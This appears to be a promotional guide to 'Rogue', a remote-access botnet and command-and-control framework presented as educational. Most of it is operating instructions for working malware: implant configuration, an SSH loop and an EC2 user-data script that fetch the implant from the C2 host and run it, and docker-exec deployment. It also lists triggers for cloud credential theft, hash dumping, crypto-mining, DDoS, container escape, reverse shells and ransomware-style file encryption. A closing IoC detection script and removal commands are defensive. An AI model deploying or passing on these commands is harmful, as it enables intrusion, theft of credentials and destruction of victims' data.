
Rogue Botnet: Building and Understanding a Modular RAT w/C2 Framework

Disclaimer: This article is for educational purposes and authorized testing only.

Rogue is an educational command-and-control (C2) botnet framework built for ethical hackers, red team operators, and defensive researchers. Version 3.2 introduces cloud‑aware implants, provider‑specific payloads (AWS, Azure, GCP, Kubernetes), a full web administration panel, and destructive file encryption modules. This is not a toy; it is a professional‑grade testing platform that exposes the inner workings of modern botnets.

The project prioritises clarity over obfuscation. Every encrypted packet, every persistence mechanism, and every cloud detection routine is laid bare so you can learn, adapt, and defend.


>_ Disclaimer – Read Before Touching Code

Rogue is provided strictly for educational and authorised testing purposes.
The file encryption payload (fileransom.py) is destructive – it permanently removes original files during encryption.
Cloud exploitation modules (AWS/Azure/GCP credential harvesters, container escapes) must only be used on environments you own or have explicit written permission to test.

You assume full liability for misuse. The author grants no warranty and accepts no responsibility for data loss, legal consequences, or system damage.


>_ What’s New in v3.2 – Cloud Warfare


>_ Installation – Spinning Up the C2

Tested on Kali Linux / Debian (bare metal or VM). Python 3.8+ required.

git clone https://github.com/ekomsSavior/rogue.git
cd rogue
sudo apt update
sudo apt install python3 python3-pip python3-dev python3-venv -y

# Core dependencies
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput --break-system-packages

# Cloud & advanced features
pip3 install boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage --break-system-packages

If you prefer a venv (cleaner, but who has time):

python3 -m venv rogue_env
source rogue_env/bin/activate
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage

Ngrok – Punching Through NAT

wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar -xvzf ngrok-v3-stable-linux-amd64.tgz
sudo mv ngrok /usr/local/bin/
ngrok config add-authtoken YOUR_NGROK_AUTH_TOKEN

>_ File Structure – Know Your Arsenal

File / Directory – Purpose
rogue_c2.py – AES‑encrypted C2 server with web admin panel
rogue_implant.py – Deployable implant: cloud detection, persistence, fallback
payloads/ – Modular scripts (cloud stealers, DDoS, miner, process injection, file encryption, etc.)
rogue_env/ – Optional virtual environment

>_ Core Architecture – How the Snake Moves

AES‑256 Encrypted Channel

All traffic between implants and the C2 is encrypted with a shared 16‑byte key. The key is hardcoded in both rogue_c2.py and rogue_implant.py; for real ops, rotate it per engagement.

Cloud Detection & Adaptation (v3.2)

On startup, the implant probes:
- http://169.254.169.254/latest/meta-data/ → AWS EC2
- http://169.254.169.254/metadata/instance?api-version=2021-02-01 → Azure VM
- http://metadata.google.internal/computeMetadata/v1/ → GCP
- /.dockerenv or cgroup entries → Docker / Kubernetes

Based on the detected environment, the implant automatically:
- Chooses hidden directories (~/.cache/.rogue, /var/lib/cloud/.cache, etc.)
- Adapts persistence (cloud‑init user‑data for AWS, VM extensions for Azure, startup scripts for GCP)
- Pre‑fetches relevant cloud payloads

Payload Loader

The C2 hosts a simple HTTP server (port 8000). Implants fetch payloads from PAYLOAD_REPO and execute them via run_payload or load_payload.

Trigger System

Pre‑defined triggers like trigger_mine, trigger_ddos, trigger_aws_creds execute built‑in or downloaded modules. Triggers can be issued to all connected bots or a single bot (target <index>).

Peer‑to‑Peer Fallback

If the primary C2 goes dark, implants broadcast UDP discovery packets to locate other Rogue nodes on the same network, then switch to a secondary C2.

Persistence – You Can’t Kill What Keeps Coming Back

The implant hides in ~/.cache/.rogue and adds a stub to .bashrc. Cloud‑aware persistence modifies cloud‑init, custom script extensions, or Kubernetes cron jobs.


>_ Running the C2 – Light It Up

python3 rogue_c2.py

Sample output:

============================================================
 ROGUE C2 SERVER - Complete Command & Control
============================================================
[+] Exfil listener started on port 9091
[+] Reverse shell listener started on port 9001
[*] Starting ngrok tunnel...
[+] C2 SERVER IS LIVE!
[NGROK] C2 URL: https://your-subdomain.ngrok-free.dev
[ADMIN] Web Panel: http://localhost:4444/admin
[CLOUD] 5 Cloud Payloads Added
[ADVANCED] 4 Advanced Payloads Added
[FILE ENCRYPTION] System-wide modes: system_test, system_user, system_aggressive, system_destructive

Web panel: http://localhost:4444/admin
Ngrok tunnel: https://*.ngrok-free.dev – implants use this URL.


>_ Deploying an Implant – Own the Box

  1. Copy rogue_implant.py to the target.
  2. Edit these variables:
C2_HOST = 'your-subdomain.ngrok-free.dev'
C2_PORT = 4444
PAYLOAD_REPO = "https://your-subdomain.ngrok-free.dev/payloads/"
SECRET_KEY = b'16_byte_shared_key'   # must match rogue_c2.py
  3. Run:
python3 rogue_implant.py

Mass Deployment – Spread the Plague

SSH to Linux hosts:

for ip in $(cat targets.txt); do
    scp rogue_implant.py user@$ip:/tmp/
    ssh user@$ip "cd /tmp && python3 rogue_implant.py &"
done

AWS EC2 via user‑data:

cat > user-data.sh << 'EOF'
#!/bin/bash
wget https://your-c2.ngrok-free.dev/payloads/rogue_implant.py -O /tmp/rogue.py
python3 /tmp/rogue.py &
EOF
aws ec2 run-instances --image-id ami-12345678 --user-data file://user-data.sh

Docker container – break the sandbox:

docker cp rogue_implant.py container_name:/tmp/
docker exec container_name python3 /tmp/rogue_implant.py &

>_ Hosting Payloads – Feed the Horde

The C2 automatically serves payloads from payloads/ via ngrok. Manual server:

cd payloads
python3 -m http.server 8000

Ensure PAYLOAD_REPO in rogue_implant.py points to the correct URL.


>_ Command Syntax – C2 Console

Once bots connect, use target <index> to select a specific bot, or issue commands to all.

Command – Description
list – Show connected bots (with cloud environment badge)
target 2 – Switch to bot #2
load_payload mine.py – Download mine.py from the HTTP server
run_payload mine.py – Execute the module
reverse_shell – Open a reverse shell on port 9001 (run nc -lvnp 9001 first)
trigger_mine – Execute the mining payload on all bots
trigger_ddos <target> <port> <duration> <threads> <mode> – Launch DDoS
trigger_aws_creds – Harvest AWS credentials
trigger_container_escape – Break out of Docker
trigger_fileransom encrypt /path [password] – DESTRUCTIVE: encrypt files
help – Show all commands

>_ Payload Reference – The Sharp End

Core Payloads (pre‑v3.2)

mine.py – Monero CPU miner (SHA256)
Edit WALLET and POOL. Real pool required for yield.

ddos.py – Multi‑mode DDoS engine
Modes: http, udp, tcp. Optional Tor routing (USE_TOR = True).

sysrecon.py – System recon (hardware, network, users, processes, defences)
Trigger: trigger_sysrecon

linpeas_light.py – Linux privilege escalation checker
Trigger: trigger_linpeas

hashdump.py – Extract password hashes (/etc/shadow, SSH keys, browser creds)
Trigger: trigger_hashdump


Advanced Payloads (v3.1+)

Payload (Trigger) – Description
process_inject.py (trigger_procinject) – Inject into systemd, sshd, nginx, apache; memory‑only
advanced_filehider.py (trigger_filehide) – Hide files using extended attributes, dot prefixes, filesystem tunneling
advanced_cron_persistence.py (trigger_cronpersist) – Obfuscated cron with randomised schedules, self‑healing
competitor_cleaner.py (trigger_compclean) – Detect and remove other malware families / backdoors

Cloud Payloads (v3.2 – new)

Payload (Trigger) – Target
cloud_detector.py (trigger_cloud_detect) – AWS/Azure/GCP/Docker/K8s fingerprinting
aws_credential_stealer.py (trigger_aws_creds) – IAM roles, metadata, ~/.aws/, env vars
azure_cred_harvester.py (trigger_azure_creds) – Managed identity tokens, Azure CLI, service principals
gcp_cred_stealer.py (trigger_gcp_creds) – GCP metadata, ~/.config/gcloud, access tokens
container_escape.py (trigger_container_escape) – Docker socket, privilege escalation, mount namespace breakout
k8s_secret_stealer.py (trigger_k8s_creds) – Kubernetes secrets, service account tokens, configmaps

Cloud detection output example:

[CLOUD] Provider: AWS (confidence: high)
[CLOUD] Metadata: i-0a1b2c3d4e5f67890, us-east-1
[CLOUD] Adapted persistence: cloud-init user-data

Destructive Payload – File Encryption

fileransom.py – AES‑256 encryption/decryption.
WARNING: Original files are permanently removed. Recovery requires the exact password.

trigger_fileransom encrypt /home/user/Documents mySecretPassword
trigger_fileransom decrypt /home/user/Documents mySecretPassword

If no password is supplied, a random 32‑char string is generated and saved to encryption_log.txt on the target.


>_ Web Interface – Command from the Throne

Access: http://localhost:4444/admin

Tab – Function
Active Bots – List implants with cloud environment badge. Send commands, view queues.
Operations – Pre‑built triggers (recon, cred access, persistence, cloud ops, compound ops).
Payloads – Browse and load all payloads (cloud, advanced, core). Colour‑coded badges.
Advanced – Process injection, advanced file hider, cron persistence, competitor cleaner.
Cloud Ops – Dedicated panel: cloud detection, AWS/Azure/GCP harvesting, container escape, K8s secret stealer, full cloud scanner.
Results – Command output history, filterable by bot ID.
Server Status – Uptime, ngrok URL, active bot count, payload counts.

Cloud Ops – Quick Commands

trigger_cloud_detect          # Identify environment
trigger_cloud_recon           # Provider‑specific intel
trigger_aws_creds             # Steal AWS keys
trigger_azure_creds           # Steal Azure tokens
trigger_container_escape      # Break out of Docker
trigger_k8s_creds             # Harvest Kubernetes secrets
trigger_cloud_scan full       # Metadata + credentials + resources

>_ Extending Rogue – Red Team Hardening

The base framework is raw. For real operations, add these layers:

Obfuscate C2 Infrastructure

Alternative Communication Channels


>_ Emergency Removal & Forensics – Burn It All

If you need to clean a compromised test system:

General Linux

sudo pkill -9 -f rogue
rm -rf ~/.cache/.rogue
sudo sed -i '/rogue/d' ~/.bashrc /etc/cron.d/*

AWS EC2

sudo pkill -9 -f rogue
sudo rm -rf /var/lib/cloud/.cache/rogue*
sudo sed -i '/ROGUE/d' /etc/cloud/cloud.cfg

Docker / Kubernetes

# Inside container
pkill -9 -f rogue
rm -rf /.cache/.rogue

# If escape succeeded, check host for rogue processes
ps aux | grep -E "docker|containerd" | grep -v grep

IoC Detection – Cloud Environments
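This heading has no body on the page. The following host audit is an added example, not Rogue project code, that looks for the artefacts the page itself names: ~/.cache/.rogue, the .bashrc stub, /var/lib/cloud/.cache entries, cron and cloud.cfg lines mentioning rogue, fileransom's encryption_log.txt, processes whose command line contains "rogue", and sockets on the listener ports 4444, 8000, 9001 and 9091. The function names are mine; pass home and root to scan a mounted lab image instead of the live host.

```python
import re
from pathlib import Path

# Artefacts this page names: ~/.cache/.rogue, the .bashrc stub, /var/lib/cloud/.cache,
# cloud.cfg and cron edits, fileransom's encryption_log.txt, and the listener ports.
C2_PORTS = {4444, 8000, 9001, 9091}   # web panel, payload server, reverse shell, exfil
ROGUE_RE = re.compile(r"rogue", re.IGNORECASE)

def find_persistence_lines(text):
    """Lines of a .bashrc / cron / cloud.cfg file that mention 'rogue'."""
    return [ln.rstrip() for ln in text.splitlines() if ROGUE_RE.search(ln)]

def parse_proc_net_tcp(text):
    """Parse /proc/net/tcp content into (local_port, remote_port) pairs."""
    pairs = []
    for line in text.splitlines()[1:]:          # first row is the column header
        f = line.split()                         # f[1], f[2] look like "0100007F:115C"
        if len(f) >= 3:
            pairs.append(tuple(int(x.rsplit(":", 1)[1], 16) for x in f[1:3]))
    return pairs

def suspicious_connections(pairs):
    return [p for p in pairs if p[0] in C2_PORTS or p[1] in C2_PORTS]  # either end on a C2 port

def audit_host(home=None, root="/"):
    """Return human-readable findings; home/root can point at a mounted lab image."""
    home, root, findings = Path(home or Path.home()), Path(root), []
    for rel in (".cache/.rogue", "encryption_log.txt"):
        if (home / rel).exists():
            findings.append(f"artefact present: {home / rel}")
    findings += [f"cloud cache artefact: {p}" for p in root.glob("var/lib/cloud/.cache/rogue*")]
    cfgs = [home / ".bashrc", root / "etc/cloud/cloud.cfg"] + list(root.glob("etc/cron.d/*"))
    for cfg in (c for c in cfgs if c.is_file()):
        for ln in find_persistence_lines(cfg.read_text(errors="replace")):
            findings.append(f"persistence line in {cfg}: {ln}")
    for cmd in root.glob("proc/[0-9]*/cmdline"):            # live process command lines
        try:
            argv = cmd.read_bytes().replace(b"\0", b" ").decode(errors="replace")
        except OSError:                                      # process exited or unreadable
            continue
        if ROGUE_RE.search(argv):
            findings.append(f"process {cmd.parent.name}: {argv.strip()}")
    tcp = root / "proc/net/tcp"
    if tcp.is_file():
        for lp, rp in suspicious_connections(parse_proc_net_tcp(tcp.read_text())):
            findings.append(f"socket on C2 port: local {lp} remote {rp}")
    return findings

if __name__ == "__main__":
    print("\n".join(audit_host()) or "no Rogue artefacts found")
```

Review the process hits before acting on them: the removal commands above use pkill -f rogue, which kills any command line containing that string, so confirm each match is the implant first.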


>_ Final Thoughts – Know Your Enemy

Rogue is a complete educational C2 framework that mirrors real‑world cloud‑aware malware. By studying its source – from AES encryption and payload loading to cloud metadata harvesting and container escape – you gain the insight needed to defend modern infrastructures.

Do not just run it. Break it. Rebuild it. Add your own payloads. Write detection rules. Then use that knowledge to harden your own systems.

Clone the repository:
https://ek0mssavi0r.dev/tools/rogue
https://github.com/ekomsSavior/rogue
https://churchofmalware.org

Follow the author for more offensive security research:
https://instagram.com/ekoms.is.my.savior

Remember: With great power comes great responsibility. Use this tool only in isolated labs or with written authorisation. The author assumes no liability for misuse, data loss, or legal consequences.

For authorised security testing only.
